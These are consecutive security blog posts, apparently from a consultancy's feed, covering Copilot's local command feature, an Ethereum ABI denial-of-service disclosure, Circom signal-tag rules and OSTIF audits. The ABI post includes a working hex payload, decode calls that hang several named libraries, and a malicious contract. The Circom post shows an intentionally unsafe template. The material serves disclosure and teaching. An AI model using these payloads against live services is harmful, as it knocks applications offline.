Another interesting capability allows users to access hard-coded local operations through the #win_action(“command”) prompt. Each action results in a message from Copilot asking for user confirmation before performing the action. Here is the list of hard-coded #win_action options that seem to be available at the moment:

Operation Description Required Parameters Example Command
change_volume_level Increase or decrease the audio volume level by 10 points “increase” or “decrease” #win_action(“change_volume_level”, “increase”)
launch_app Open an installed app The name of the application to open #win_action(“launch_app”, “Calculator”)
list_apps Get a list of installed apps N/A #win_action(“list_apps”)
launch_screen_cast Cast your screen to a wireless device N/A #win_action(“launch_screen_cast”)
launch_troubleshoot Open one of the audio, camera, printer, network, Bluetooth, or Windows update troubleshooters The troubleshooting category #win_action(“launch_troubleshoot”, “Audio”)
manage_device Open device settings to add, remove, or manage devices N/A #win_action(“manage_device”)
mute_volume Mute or unmute the audio “mute” or “unmute” #win_action(“mute_volume”, “mute”)
set_bluetooth Enable or disable Bluetooth “on” or “off” #win_action(“set_bluetooth”, “on”)
set_change_theme Change the color theme “dark” or “light” #win_action(“set_change_theme”, “dark”)
set_do_not_disturb Enable or disable “do not disturb” mode “on” or “off” #win_action(“set_do_not_disturb”, “on”)
set_focus_session Set a focus session for a requested number of minutes A number of minutes #win_action(“set_focus_session”, “30”)
set_volume Set the audio volume level to a specified value A number between 0 and 100, representing volume percentage #win_action(“set_volume”, “50”)
set_wallpaper Personalize your background (i.e., open the Personalization > Background page in settings) N/A #win_action(“set_wallpaper”)
snap_window Snap your active windows and share many app windows on a single screen “left”, “right”, or “none” (choosing “none” allows you to select the layout you prefer) #win_action(“snap_window”, “left”)
start_snipping_tool Take a screenshot using the Snipping Tool (Optional) A number between 0 and 30 to specify a delay before the screenshot is taken; default: 3 seconds #win_action(“start_snipping_tool”, “5”)

Currently, while all these actions are local, they cannot be used while the machine is offline. As Copilot matures, we look forward to seeing what new capabilities it can provide.

Even though Microsoft Copilot is in its early stages, it demonstrates significant capabilities. But as with any cloud-based AI application, it raises security and privacy concerns. These concerns center mainly on the fact that queries must be sent to a server for processing, where they might be stored, used to further train the AI model, or shared with other companies for various purposes (such as personalized advertising).

Additionally, Copilot’s capacity to effect change on local systems is particularly noteworthy. This functionality introduces new concerns regarding the role of AI in desktop environments, a role that extends beyond the reach of most current AI-enabled products. For example, the ability to trigger local operations through Copilot could help attackers perform local actions on a machine without being detected; and if Microsoft expands the list of available operations in the future, this concern will only grow. Though the integration of AI into desktop environments is an exciting development, these concerns will have to be a critical focus for developers and researchers as Microsoft continues iterating on Copilot, and as more AI–operating system integrations inevitably enter the scene.

Billion times emptiness

29 December 2023 at 14:00

By Max Ammann

Behind Ethereum’s powerful blockchain technology lies a lesser-known challenge that blockchain developers face: the intricacies of writing robust Ethereum ABI (Application Binary Interface) parsers. Ethereum’s ABI is critical to the blockchain’s infrastructure, enabling seamless interactions between smart contracts and external applications. The complexity of data types and the need for precise encoding and decoding make ABI parsing challenging. Ambiguities in the specification or implementation may lead to bugs that put users at risk.

In this blog post, we’ll delve into a newfound bug that targets these parsers, reminiscent of the notorious “Billion Laughs” attack that plagued XML in the past. We uncover that the Ethereum ABI specification was written loosely in parts, leading to potentially vulnerable implementations that can be exploited to cause denial-of-service (DoS) conditions in eth_abi (Python), ethabi (Rust), alloy-rs, and ethereumjs-abi, posing a risk to the availability of blockchain platforms. At the time of writing, the bug is fixed only in the Python library; the maintainers of the other libraries opted for full disclosure through GitHub issues.

What is the Ethereum ABI?

Whenever contracts on the chain interact or off-chain components talk to the contracts, Ethereum uses ABI encoding for requests and responses. The encoding is not self-describing: encoders and decoders must be given a schema that defines the represented data types. Unlike the platform-dependent ABI of the C programming language, the Ethereum ABI specifies in a platform-independent way how data is passed between applications in binary form. Even though the specification is not formal, it gives a good understanding of how data is exchanged.

Currently, the specification lives in the Solidity documentation. The ABI definition influences the types used in languages for smart contracts, like Solidity and Vyper.

Understanding the bug

Zero-sized types (ZSTs) are data types that take zero (or minimal) bytes to store on disk but substantially more to represent once loaded in memory. The Ethereum ABI allows ZSTs, which can be abused for a denial-of-service (DoS) attack by forcing the application to allocate an immense amount of memory to handle a tiny on-disk or over-the-network representation.

Consider the following example: What happens when a parser encounters an array of ZSTs? It should try to parse as many ZSTs as the array claims to contain. Because each array element takes zero bytes, defining an enormously large array of ZSTs is trivial.

As a concrete example, the following figure shows a payload of 20 on-disk bytes, which will deserialize to an array of the numbers 2, 1, and 3. A second payload of 8 on-disk bytes will deserialize to 2^32 elements of a ZST (like an empty tuple or empty array).

This would not be a problem if each ZST took up zero bytes of memory after parsing. In practice, this is rarely the case. Typically, each element will require a small but non-zero amount of memory to store, leading to an enormous allocation to represent the entire array. This leads to a denial of service attack.
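
To see why, consider the following hypothetical decoder sketch in Python (our own illustration, not code from any of the libraries discussed below). It trusts a claimed element count and builds one in-memory object per element, so a zero-sized element type costs the attacker nothing per element while costing the decoder memory on every iteration.

# Hypothetical length-prefixed decoder, shown only to illustrate the amplification.
def decode_array(data: bytes, element_size: int) -> list:
    count = int.from_bytes(data[:4], "big")              # attacker-controlled length
    out, offset = [], 4
    for _ in range(count):
        out.append(data[offset:offset + element_size])   # one Python object per element
        offset += element_size                           # advances by 0 for a zero-sized type
    return out

# Four bytes of input claim almost 2**32 zero-sized elements; the loop tries to
# build billions of objects in memory before the input is exhausted.
malicious_input = (2**32 - 1).to_bytes(4, "big")
# decode_array(malicious_input, element_size=0)          # would exhaust memory -- do not run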

Robust parser design is crucial to prevent severe issues like crashes, misinterpretations, hangs, or excessive resource usage. The root cause of such issues can lie in either the specifications or the implementations.

In the case of the Ethereum ABI, I argue that the specification itself is flawed. It had the opportunity to explicitly prohibit Zero-Size Types (ZST), yet it failed to do so. This oversight contrasts with the latest Solidity and Vyper versions, where defining ZSTs, such as empty tuples or arrays, is impossible.

To ensure maximum safety, file format specifications must be crafted carefully, and their implementations must be rigorously fortified to avoid unforeseen behaviors.

Proof of concept

Let’s dive into some examples that showcase the bug in several libraries. We define the data payload as:

0000000000000000000000000000000000000000000000000000000000000020
00000000000000000000000000000000000000000000000000000000FFFFFFFF

The payload consists of two 32-byte blocks describing a serialized array of ZSTs. The first block defines an offset to the array’s elements. The second block defines the length of the array. Independent of the programming language, we will always reference it as payload.
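
For reference, the payload can be rebuilt with a few lines of Python (our own construction, shown only to make the two blocks explicit; hex case does not matter when decoding):

# Two 32-byte big-endian words: an offset to the array data, then the claimed length.
offset = (0x20).to_bytes(32, "big")          # points at byte 32, where the array's length word sits
length = (0xFFFFFFFF).to_bytes(32, "big")    # the array claims 2**32 - 1 elements
payload = (offset + length).hex()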

We will try to decode this payload using the ABI schemata ()[] and uint32[0][] using several different Ethereum ABI parsing libraries. The former representation is a dynamic array of empty tuples, and the latter is a dynamic array of empty static arrays. The distinction between dynamic and static is important because an empty static array takes zero bytes, whereas a dynamic one takes a few bytes because it serializes the length of the array.

eth_abi (Python)

The following Python program uses the official eth_abi library (<4.2.0); the program will first hang and then terminate with an out-of-memory error.

from eth_abi import decode
data = bytearray.fromhex(payload)
decode(['()[]'], data)

The eth_abi library only supported the empty tuple representation; an empty static array was undefined.

ethabi (Rust)

The ethabi library (v18.0.0) allows triggering the bug directly from its CLI.

cargo run -- decode params -t "uint32[0][]" $payload

ethers-rs (Rust)

The following Rust program uses the ethers-rs library and the schema uint32[0][] implicitly through the Rust type Vec<[u32; 0]>, which corresponds to it.

use ethers::abi::AbiDecode;
let data = hex::decode(payload).unwrap();
let _ = Vec::<[u32; 0]>::decode(&data).unwrap();

It is vulnerable to the DoS issue because the ethers-rs library (v2.0.10) uses ethabi.

foundry (Rust)

The foundry toolkit uses ethers-rs, which suggests that the DoS vector should also be present there. It turns out it is!

One way to trigger the bug is by directly decoding the payload via the CLI, just like in ethabi.

cast --abi-decode "abc()(uint256[0][])" $payload

Another, more interesting proof of concept is to deploy the following malicious smart contract. It uses assembly to return data that matches the payload.

contract ABC {
    fallback() external {
        bytes memory data = abi.encode(0x20, 0xfffffffff);

        assembly {
            return(add(data, 0x20), mload(data))
        }
    }
}

If the contract’s return type is defined, it can lead to a hang and huge memory consumption in the CLI tool. The following command calls the contract on a testnet.

cast call --private-key \
0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80 \
-r http://127.0.0.1:8545 0x5fbdb2315678afecb367f032d93f642f64180aa3 \
"abc() returns (uint256[0][])"

alloy-rs

The ABI parser in alloy-rs (0.4.2) encounters the same hang as the other libraries if the payload is decoded.

use alloy_dyn_abi::{DynSolType, DynSolValue};
let my_type: DynSolType = "()[]".parse().unwrap();
let decoded = my_type.abi_decode(&hex::decode(payload).unwrap()).unwrap();

ethereumjs-abi

Finally, the ABI parser ethereumjs-abi (0.6.8) library is also vulnerable.

var abi = require('ethereumjs-abi')
data = Buffer.from(payload, "hex")
abi.rawDecode([ "uint32[]" ], data)
// or this call: abi.rawDecode([ "uint32[0][]" ], data)

Other libraries

The libraries go-ethereum and ethers.js do not have this bug because they implicitly disallow ZSTs: they expect each element of an array to be at least 32 bytes long. The web3.js library is also not affected because it uses ethers.js.
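
A Python sketch of that general defense (ours, not the actual go-ethereum code) is to bound the claimed element count by the bytes actually present before allocating anything:

def checked_length(data: bytes, min_element_size: int = 32) -> int:
    """Reject lengths that cannot possibly be backed by the remaining input.
    Requiring at least 32 bytes per element implicitly rules out zero-sized types."""
    count = int.from_bytes(data[:32], "big")
    available = len(data) - 32
    if count > available // min_element_size:
        raise ValueError("declared array length exceeds available input")
    return count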

How the bug was discovered

The idea for testing for this type of bug came after I stumbled upon an issue in the borsh-rs library. To mitigate the DoS vector, the Rust library tried to parse arrays of ZSTs in constant time, which caused undefined behavior; the library’s authors ultimately decided to simply disallow ZSTs completely. During another audit, a custom ABI parser also had a DoS vector when parsing ZSTs. Seeing as these two issues were unlikely to be a coincidence, we investigated other ABI parsing libraries for this bug class.

How to exploit it

Whether this bug is exploitable depends on how the affected library is used. In the examples above, the demonstration targets were CLI tools.

I did not find a way to craft a smart contract that triggers this bug and deploys it to the mainnet. This is mainly because Solidity and Vyper programs disallow ZST in their latest version.

However, any application that uses one of the above libraries is potentially vulnerable. An example of a potentially vulnerable application is Etherscan, which parses untrusted ABI declarations. Also, any off-chain software fetching and decoding data from contracts could be vulnerable to this bug if it allows users to specify ABI types.

Fuzz your decoders!

Bugs in decoders are usually easy to catch by fuzzing the decoding routine, because the inputs are commonly byte arrays that can be fed directly to fuzzers. Of course, there are exceptions, like the recent libwebp 0-day (CVE-2023-4863), which went undetected despite endless hours of fuzzing in OSS-Fuzz.
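
As an illustration, a minimal Atheris harness for the Python eth_abi decoder might look like the sketch below. The schema list and the broad exception handling are our own simplifications; a real harness would exercise many type strings and rely on the fuzzer’s timeout and memory limits to surface hangs like the one described above.

import sys
import atheris

with atheris.instrument_imports():
    from eth_abi import decode

def TestOneInput(data: bytes):
    try:
        decode(["uint256[]"], data)   # illustrative schema; vary this in practice
    except Exception:
        pass                          # malformed inputs are expected to raise

atheris.Setup(sys.argv, TestOneInput)
atheris.Fuzz()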

In our audits at Trail of Bits, we employ fuzzing to identify bugs and educate clients on how to conduct their own fuzzing. We aim to contribute our fuzzers to Google’s OSS-Fuzz for continual testing, thus supplementing manual reviews by prioritizing crucial audit components. We’re updating our Testing Handbook, an exhaustive resource for developers and security professionals, to include specific guidance on optimizing fuzzer configuration and automating analysis tools throughout the software development lifecycle.

Coordinated disclosure

As part of the disclosure process, we reported the vulnerabilities to the library authors.

  • eth_abi (Python): The Ethereum-owned library fixed the bug as part of a private GitHub advisory. The bug was fixed in version v4.2.0.
  • ethabi (Rust) and alloy-rs: The maintainers of the crates asked that we open GitHub issues after the end of the embargo period. We created the corresponding issues here and here.
  • ethereumjs-abi: We got no response from the project and thus created a GitHub issue.
  • ethers-rs and foundry: We informed the projects about their usage of ethabi (Rust). We expect they will update to the patched versions of ethabi as soon as they are available or switch to another ABI decoding implementation. The general community will be notified by releasing a RustSec advisory for ethabi and alloy-rs and a GitHub advisory for eth_abi (Python).

The timeline of disclosure is provided below:

  • June 30, 2023: Initial reach out to maintainers of ethabi (Rust), eth_abi (Python), alloy-rs and ethereumjs-abi crates.
  • June 30, 2023: Notification by the alloy-rs maintainers that a GitHub issue should be created.
  • June 30, 2023: First response by the eth_abi (Python) project and internal triaging started.
  • July 26, 2023: Clarified ethabi’s maintenance status through a GitHub issue, which led to a notice in the README file. Because the crate is unmaintained, we planned to post a GitHub issue after the embargo.
  • August 2, 2023: Created private security advisory on GitHub for eth_abi (Python).
  • August 31, 2023: Fix is published by eth_abi (Python) without public references to the DoS vector. We later verified this fix.
  • December 29, 2023: Publication of this blog post and GitHub issues in the ethabi, alloy-rs, and ethereumjs-abi repositories.

Tag, you’re it: Signal tagging in Circom

2 January 2024 at 14:00

By Tjaden Hess

We at Trail of Bits perform security reviews for a seemingly endless stream of applications that use zero-knowledge (ZK) proofs. While fast new arithmetization and folding libraries like Halo2, Plonky2, and Boojum are rapidly gaining adoption, Circom remains a mainstay of ZK circuit design. We’ve written about Circom safety before in the context of Circomspect, our linter and static analyzer; in this post, we will look at another way to guard against bugs in your Circom circuits using a lesser-known language feature called signal tags. We present four simple rules for incorporating signal tags into your development process, which will help protect you from common bugs and facilitate auditing of your codebase.

This post assumes some familiarity with the Circom language. We will examine some simple Circom programs and demonstrate how signal tags can be used to detect and prevent common classes of bugs; we will also point out potential pitfalls and weaknesses of the signal tagging feature.

Warning: For the remainder of this post, we will be working with Circom 2.1.6. Details of tag propagation have changed since 2.1.0—we highly recommend using version 2.1.6 or higher, as earlier versions contain severe pitfalls not mentioned in this post.

What are signal tags?

Signal tagging is a feature introduced in Circom 2.1.0 that allows developers to specify and enforce—at compile time—ad hoc preconditions and postconditions on templates. Circom tags help developers ensure that inputs to templates always satisfy the requirements of the template, guarding against soundness bugs while reducing duplication of constraints.

Here is the CircomLib implementation of the boolean OR gate:

template OR() {
    signal input {binary} a;
    signal input {binary} b;
    signal output {binary} out;

    out <== a + b - a*b;
}

circomlib/circuits/gates.circom#37–43

Assume that we are writing a ZK circuit that requires proof of authentication whenever either of two values (e.g., outgoing value transfers) is nonzero. An engineer might write this template to enforce the authentication requirement.

// Require `authSucceeded` to be `1` whenever outgoing value is nonzero
template EnforceAuth() {
    signal input valueA;
    signal input valueB;
    signal input authSucceeded;

    signal authRequired <== OR()(valueA, valueB);
    (1 - authSucceeded) * authRequired === 0;
}

When tested with random or typical values, this template will seem to behave correctly; nonzero values of valueA and valueB will be allowed only when authSucceeded is 1.

However, what about when valueA == valueB == 2? Notice that authRequired will be zero and thus the desired invariant of EnforceAuth will be violated.

So what went wrong? There was an implicit precondition on the OR template that a and b both be binary—that is, in the set {0,1}. Violating this condition leads to unexpected behavior.

One way to approach the issue is to add constraints to the OR gate requiring that the inputs be binary:

template OR() {
    signal input a;
    signal input b;
    signal output out;

    // Constrain a and b to be binary
    a * (1 - a) === 0;
    b * (1 - b) === 0;
    
    out <== a + b - a*b;
}

The problem with this approach is that we have just tripled the number of constraints needed per OR gate. Often the inputs will have already been constrained earlier in the circuit, which makes these constraints purely redundant and needlessly increases the compilation and proving time.

In many languages, input constraints would be expressed as types. Circom, unlike more flexible API-driven frameworks like Halo2, does not support expressive types; all signals can carry any value between 0 and P. However, Circom 2.1.0 and higher does support signal tags, which can be used as a sort of ad-hoc type system.

Let’s see how the OR template would look using signal tags:

template OR() {
    signal input {binary} a;
    signal input {binary} b;
    signal output {binary} out;

    out <== a + b - a*b;
}

Notice that the logic is entirely unchanged from the original; tags do not affect the compiled constraint system at all. However, if we try compiling the EnforceAuth template now, we get a compiler error:

error[T3001]: Invalid assignment: missing tags required by input signal.
 Missing tag: binary
   ┌─ "example1.circom":18:26
   │
18 │     signal authRequired <== OR()(valueA, valueB);
   │                             ^^^^^^^^^^^^^^^^^^^^ found here
   │
   = call trace: ->EnforceAuth

previous errors were found

Input tags are preconditions: requirements that inputs to the template must satisfy. By attaching a signal tag to the input, a developer indicates that the corresponding property must already be enforced; the template itself may assume but not enforce the condition.

Pretty cool! Now how do we rewrite the program to properly use tags? Let’s define a new template that properly checks if each value is zero before computing the OR value.

// `out` is 1 whenever `in` is nonzero, or 0 otherwise
template ToBinary() {
    signal input in;
    // POSTCONDITION: out is either 0 or 1
    // PROOF:
    // in != 0 => out == 1 (by constraint (2))
    // in == 0 => out == 0 (by constraint (1))
    signal output {binary} out;
    
    signal inv <-- in!=0 ? 1/in : 0;
    out <== in*inv;
    in*(1 - out) === 0;
}

This is essentially the negation of the CircomLib IsZero template, normalizing the input and adding the binary tag to the output. Note that binary is just an arbitrary string – Circom does not know anything about the semantics that we intend binary to have and in particular does not check that out is in the set {0,1}. Circom simply attaches the opaque tag binary to the output wire of ToBinary.

Output tags are postconditions: promises that the developer makes to downstream users of the signal.

Note that, as Circom does not check our postconditions for us, we must be very careful not to accidentally assign a label to a signal that could possibly carry a value outside the allowed values for the tag. In order to keep track of all the potential ways that a signal can be assigned a tag, we recommend including a comment just above any template output with tags, explaining the reason that the postcondition is satisfied.

Now we can plug this into our EnforceAuth circuit, and everything compiles!

// Require `authSucceeded` to be `1` whenever outgoing value is nonzero
template EnforceAuth() {
    signal input valueA;
    signal input valueB;
    signal input authSucceeded;

    signal spendsA <== ToBinary()(valueA);
    signal spendsB <== ToBinary()(valueB);

    signal authRequired <== OR()(spendsA, spendsB);
    (1 - authSucceeded) * authRequired === 0;
}

Under the hood, Circom is propagating the tag attached to the output signal of ToBinary, so that spendsA also has the tag. Then when OR checks that its input has the binary tag, it is satisfied.

Tag propagation

Tags are propagated through direct assignment, but not through arithmetic operations. In the following example, signal x acquires the binary tag from in.

template Example {
    signal input {binary} in;

    // x gets the `binary` tag
    signal x <== in;
    // one_minus_x does not have the `binary` tag;
    signal one_minus_x <== 1 - x;

    // Compiler Error
    1 === OR()(x, one_minus_x);
    
    // Assume NOT is defined to return a binary output, like OR.
    signal not_x <== NOT()(x);
    // Then this is OK
    1 === OR()(x, not_x);
}

Elements of a signal array have a tag if and only if all members of the array have that tag.

template Example {
    signal input {binary} a;
    signal input {binary} b;
    signal input c;
    
    // xs does not have tag `binary` because `c` does not have the tag
    signal xs[3] <== [a, b, c];

    // Error: missing tag
    1 === OR()(xs[0], xs[1]);
}

Tags with value

A common source of soundness bugs in zero-knowledge circuits occurs when arithmetic operations unexpectedly overflow the finite field modulus. Signal tags in Circom can also carry values, which are compile time variables that are propagated along with the tag. Using tags with value, we can ensure at compile time that operations never overflow.

template EnforceMaxBits(n) {
    assert(n < 254); // Number of bits in the finite field 
    signal input in;

    // REASON: Num2Bits constrains in to be representable by `n` bits
    signal output {maxbits} out;
    out.maxbits = n;

    Num2Bits(n)(in);
    out <== in;
}

// Add two numbers, ensuring that the result does not overflow
template AddMaxBits(){
    signal input {maxbits} a;
    signal input {maxbits} b;

    // REASON: log(a + b) <= log(2*max(a, b)) = 1 + max(log(a), log(b))
    signal output {maxbits} c;
    c.maxbits = max(a.maxbits, b.maxbits) + 1;
    assert(c.maxbits < 254);

    c <== a + b;
}

// Multiply two numbers, ensuring that the result does not overflow
template MulMaxBits(){  
    signal input {maxbits} a;
    signal input {maxbits} b;

    // REASON: log(a * b) = log(a) + log(b)
    signal output {maxbits} c;
    c.maxbits = a.maxbits + b.maxbits;
    assert(c.maxbits < 254);

    c <== a * b;
}

Tag values must be assigned before the signal is assigned. If a tag value propagates via signal assignment to a signal that already has a different tag value, Circom will throw an error.

Avoiding incorrect tag assignment

While signal tags can help prevent programming errors, the language feature syntax easily allows for accidental or unwarranted addition of tags to signals. Incorrectly assigning a tag to a signal that is not constrained to abide by the rules of that tag undermines the guarantees of the tag system and can easily lead to severe security issues. In order to get the full benefit of signal tags, we recommend strictly adhering to these usage rules.

Rule #1: Output and internal tag annotations must be accompanied by an explanatory comment

We mentioned before that adding tag annotations to output signals is dangerous. Internal signals can also be declared with a tag annotation, which unconditionally adds the tag to the signal. For example, this unsafe modification of the original EnforceAuth program uses tagged internal signals:

// Require `authSucceeded` to be `1` whenever outgoing value is nonzero
template EnforceAuth() {
    signal input valueA;
    signal input valueB;
    signal input authSucceeded;

    // These signals acquire the `binary` tag
    // _without_ any checks that the values are in fact binary
    // This is UNSAFE
    signal {binary} spendsA <== valueA;
    signal {binary} spendsB <== valueB;

    signal authRequired <== OR()(spendsA, spendsB);
    (1 - authSucceeded) * authRequired === 0;
}

We strongly recommend that manually tagged internal and output signals be avoided when possible. Any output or internal signal tag annotations must be accompanied by a comment explaining why the tag requirements are satisfied.

Rule #2: Tags should be added to signals using dedicated library templates

In order to minimize the use of manual signal tag annotation in high-level code, we recommend providing a library of helper templates comprising a safe API for using the tag. The following code exemplifies a library for binary values that contains constructors and type-safe operators.

// binary.circom
// Tags:
//     binary: signals must be either 0 or 1

// Create a binary value from a constant 0 or 1
template BinaryConstant(b){
    // REASON: Only valid values are allowed at compile time
    signal output {binary} out;
    assert(b == 0 || b == 1);
    out <== b;
}

// Constrains a signal to be binary and returns a tagged output
template EnforceBinary(){
    signal input in;
    // REASON: Only solutions to x*(x-1) = 0 are 0 and 1
    signal output {binary} out;
    
    in * (in - 1) === 0;
    out <== in;
}

// Empty template simply asserts that input is tagged
// Useful for checking / documenting post conditions on output signals
template AssertBinary() {
    signal input {binary} in;
}

// Returns 1 when input is "truthy" (nonzero), 0 when input is zero
template ToBinary() {
    signal input in;
    // REASON:
    // in != 0 => out == 1 (by constraint (2))
    // in == 0 => out == 0 (by constraint (1))
    signal output {binary} out;
    
    signal inv <-- in!=0 ? 1/in : 0;
    out <== in*inv;
    in*(1 - out) === 0;
}

template AND(){
    signal input {binary} a;
    signal input {binary} b;
    // REASON: 1*1 = 1, 1*0 = 0, 0*1 = 0, 0*0 = 0
    signal output {binary} out <== a*b;
}

template NOT(){
    signal input {binary} in;
    // REASON: 1 - 0 = 1, 1 - 1 = 0
    signal output {binary} out <== 1 - in;
}

template OR() {
    signal input {binary} a;
    signal input {binary} b;
    // REASON: a = 0 => out = b - 0*b = b, a = 1 => out = 1 + b - 1*b = 1
    signal output {binary} out;

    out <== a + b - a*b;
}

Once a sufficiently rich library of templates has been established, developers should rarely need to manually add a tag elsewhere. Reducing the number of manual tags makes auditing for correctness much easier.

Postconditions of higher-level templates can be documented using assertion templates like AssertBinary, without using output tag annotations:

template IsZero() {
    signal input in;
    // POSTCONDITION: out has `binary` tag
    signal output out; // Avoid risky output tag annotation here
    
    signal isNonZero <== ToBinary()(in); // Avoid risky internal tag annotation here
    
    out <== NOT()(isNonZero);
    
    AssertBinary()(out); // Document and check postcondition with no runtime cost
}

Rule #3: Explicit tag value assignments should be scarce and documented

Most tag values should be assigned automatically by library functions, as in the maxbits example. Whenever a signal is assigned a tag value, an explanatory comment should be nearby.

Rule #4: Tags with value must always have a value

Every tag in the codebase must either always have an associated value or never have an associated value. Mixing the two can cause confusion, especially when dealing with signal arrays.

A real-world example

We will look at two issues from our review of Succinct Labs’ Telepathy and explain how Circom tags could have been used to prevent them.

Telepathy is an implementation of the Ethereum sync committee light client protocol, using zkSNARKs written in Circom to accelerate verification of aggregate BLS signatures. The exact details of ETH2.0 light clients and BLS aggregation are not required to understand the bugs, but a refresher on elliptic curves and some notes on big-integer arithmetic in Circom will be useful.

The ETH2.0 light client protocol uses aggregate BLS signatures over the BLS12-381 curve1. Public keys are points (X, Y) on the BLS12-381 curve, where Y^2 = X^3 + 4 mod Q and Q is a 381-bit prime. Notice that the coordinates of the BLS public keys are 381 bits, while Circom signals can represent at most 254 bits. In order to represent a single public key coordinate, circom-pairing uses seven Circom signals (called “limbs”), each holding a 55-bit value. In order to ensure that representations of big integers are unique and to prevent overflow during arithmetic operations, the developer must ensure that the value of each limb is less than 2^55.
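
As a rough Python sketch of that limb representation (our own illustration; circom-pairing’s exact conventions may differ, e.g., in limb ordering), a 381-bit coordinate is split into seven 55-bit limbs, and the representation is unique only if every limb is range-checked:

def to_limbs(x: int, n: int = 55, k: int = 7) -> list[int]:
    """Split a big integer into k limbs of n bits each (least-significant limb first)."""
    assert x < (1 << (n * k)), "value does not fit in k limbs of n bits"
    return [(x >> (n * i)) & ((1 << n) - 1) for i in range(k)]

def from_limbs(limbs: list[int], n: int = 55) -> int:
    """Recombine limbs; well-formed only if every limb is below 2**n."""
    return sum(limb << (n * i) for i, limb in enumerate(limbs))

# Without per-limb range checks, a malicious prover can submit limbs >= 2**55 that
# recombine to the same integer, breaking uniqueness and enabling overflow downstream.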

Ethereum blocks contain commitments to the sync committee public keys in compressed form, meaning that the keys are stored as an X coordinate plus one extra bit to indicate the sign of Y.2 In order to perform arithmetic operations with the curve points, the Telepathy circuits require the prover to provide the Y coordinate corresponding to the public key X coordinate. This Y value is then validated by the SubgroupCheckG1WithValidX template, which in turn enforces that the curve equation holds.

/* VERIFY THAT THE WITNESSED Y-COORDINATES MAKE THE PUBKEYS LAY ON THE CURVE */
    
component isValidPoint[SYNC_COMMITTEE_SIZE];
for (var i = 0; i < SYNC_COMMITTEE_SIZE; i++) {
    isValidPoint[i] = SubgroupCheckG1WithValidX(N, K);
    for (var j = 0; j < K; j++) {
        isValidPoint[i].in[0][j] <== pubkeysBigIntX[i][j];
        isValidPoint[i].in[1][j] <== pubkeysBigIntY[i][j];
    }
}

telepathy-circuits/circuits/rotate.circom#L101-L109

template SubgroupCheckG1WithValidX(n, k){
    signal input in[2][k];
    var p[50] = get_BLS12_381_prime(n, k);
    var x_abs = get_BLS12_381_parameter();
    var b = 4;
    component is_on_curve = PointOnCurve(n, k, 0, b, p);
    for(var i=0; i<2; i++)for(var idx=0; idx<k; idx++)
        is_on_curve.in[i][idx] <== in[i][idx];
}

telepathy-circuits/circuits/pairing/bls12_381_hash_to_G2.circom#L723-L731

However, PointOnCurve assumes that the inputs are properly formatted big integers—in particular that each of the k limbs of Y is less than 2n. This check is never enforced, however, leading to uncontrolled overflow in the intermediate computations. Using this vulnerability, a malicious prover can cause the protocol to become stuck in an irrecoverable state, freezing the light client and any bridge funds depending on continued operation.

Using signal tags could have prevented this bug (TOB-SUCCINCT-1) and two others (TOB-SUCCINCT-2, TOB-SUCCINCT-14) that we found during the review. Properly formed big integer values should have a maxbits tag with a value corresponding to the size of the limbs (in this case, 55). BLS12-381 coordinates should additionally have a fp tag indicating that they are reduced modulo the base field prime. Together these two tags, used to indicate preconditions for templates that expect big integers and reduced finite field elements, would have prevented three major missing constraints in the final circuit.

Conclusion

Circom tags are a powerful feature for preventing bugs due to type confusion, missing range checks, and other common missing constraints. In order to receive the full benefits of the feature and hold yourself accountable for good development practices, follow the four simple rules above.

Tags are not a full solution to ZK circuit security. There are many other types of logic, arithmetic, and integration bugs that can compromise the security of your system. Don’t hesitate to contact us with any questions, and reach out if you would like us to review, specify, or implement any ZK circuit or protocol.

1The “BLS” acronyms in BLS signatures (Boneh–Lynn–Shacham) and BLS curves (Barreto-Lynn-Scott) overlap only for Ben Lynn, whose thesis on pairings is an excellent resource.
2For any X there are at most two corresponding Y values, of the form sqrt(X^3 + 4), -sqrt(X^3 + 4).

Securing open-source infrastructure with OSTIF

9 January 2024 at 14:00

The Open Source Technology Improvement Fund (OSTIF) counters an often overlooked challenge in the open-source world: the same software projects that uphold today’s internet infrastructure are reliant on, in OSTIF’s words, a “surprisingly small group of people with a limited amount of time” for all development, testing, and maintenance.

This scarcity of contributor time in the open-source community is a well-known problem, and it renders the internet’s critical infrastructure vulnerable. To quote OSTIF, “because of the lack of a profit motive, core open-source projects are woefully underfunded and their resources are lacking. This leaves crucial Internet infrastructure susceptible to bugs, poor documentation, poor performance, slow release schedules, and even espionage.”

We couldn’t agree more.

Over the past year, we’ve had the pleasure of collaborating with open-source project teams through OSTIF on threat modeling assessments and secure code reviews. We believe our central mission of boldly advancing security and addressing technology’s most challenging risks closely aligns with OSTIF’s goals. Through our partnership with OSTIF, we have made significant contributions that improve the security posture of the open-source community. This blog post highlights some recent security assessments that OSTIF engaged Trail of Bits to conduct.

About our work

At Trail of Bits we do many types of security work. Some of our more popular offerings include secure code review powered by bespoke fuzzing harness and fuzz test development, our custom static analysis rulesets, and targeted manual review; threat modeling exercises involving architectural review, systems thinking, and threat scenario development; CI/CD pipeline hardening; and fix reviews. Optimally, an assessment involves engineers with expertise in several of these areas. This helps us provide our clients with the best value for their dollar.

Sometimes, we involve different types of expertise in an engagement by, for example, running threat modeling exercises and then performing a code review for the same client. When we follow threat modeling work with secure code review, the code review can start from the design-level findings produced during threat modeling. This means we can more quickly write fuzzing harnesses and fuzz tests targeting the most vulnerable areas of a given codebase! Following our secure code review with a fix review then gives our security engineers the chance to help guide and reassess the mitigations implemented based on our findings.

Due to the wide range of clients who engage us, client expectations and requirements can vary. In the OSTIF-organized assessments we’ll cover below, you’ll see different combinations of these types of work. Some of these engagements included both a threat modeling exercise and a secure code review, while others just focused on code review. Common to all of these projects is our development of a tailored security assessment strategy based on the nature of the project and the client’s needs.

Linux kernel release signing

The Linux kernel runs on devices from ordinary smartphones, to the servers that make up the web’s most widely used infrastructure, to supercomputers. The internet as we know it effectively runs on Linux. A critical part of Linux development is kernel release signing, which allows users to cryptographically verify the authenticity of kernel releases to ensure their trustworthiness.

In this review, which took place from March to April of 2021, we led technical discussions with the Linux Foundation and examined their documentation on the kernel release signing process. Our assessment included an audit of the management of signing keys, developers’ workflow for signing, and the cryptographic algorithms involved in the signing and verification steps.

One of our major recommendations was that the Linux Foundation enforce the use of smart cards to store private keys, which would prevent an attacker who compromises a developer’s workstation from being able to sign malicious code. We also advised that the Linux Foundation adopt wider key distribution methods to mitigate a compromise of the git.kernel.org server currently hosting public keys, replace older signature schemes like RSA and DSA with modern and more robust alternatives like ECDSA and Ed25519, and create documentation on key management policies to prevent mistakes in the signing process.

For further information about our findings and recommendations, refer to OSTIF’s announcement of the engagement and our full report.

CloudEvents

